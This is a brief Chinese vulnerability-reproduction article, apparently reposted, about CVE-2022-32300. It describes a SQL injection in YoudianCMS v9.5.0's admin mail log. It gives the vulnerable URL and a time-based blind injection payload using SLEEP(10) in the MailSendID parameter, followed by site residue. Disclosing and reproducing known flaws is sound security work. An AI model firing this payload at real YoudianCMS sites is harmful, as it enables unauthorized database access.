描述: 友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。 通过 /A
描述:
友点企业网站管理系统(简称YouDianCMS系统)集PC站、手机站、微网站、多端小程序(微信、百度、抖音/头条、支付宝、QQ、360小程序)、APP于一体,共用空间,数据同步,是国内开源十站合一优秀企业建站解决方案。
通过 /App/Lib/Action/Admin/MailAction.class.PHP 中的 MailSendID 参数发现 YoudianCMS v9.5.0 包含 sql 注入漏洞。
易受攻击的URL为:/index.php/Admin/mail/viewLog?MailSendID=1
%20AND%20(SELECT%20*%20FROM%20(SELECT(SLEEP(10)))A)
参考文章:YoudianCMS v9.5.0 SQL 注入漏洞CVE-2022-32300-Linux实验室
来源地址:https://blog.csdn.net/weixin_50791426/article/details/128055360
--结束END--
本文标题: 漏洞复现|youdiancms 9.5.0 版本 SQL注入 (CVE-2022-32300)
本文链接: https://lsjlt.com/news/408797.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0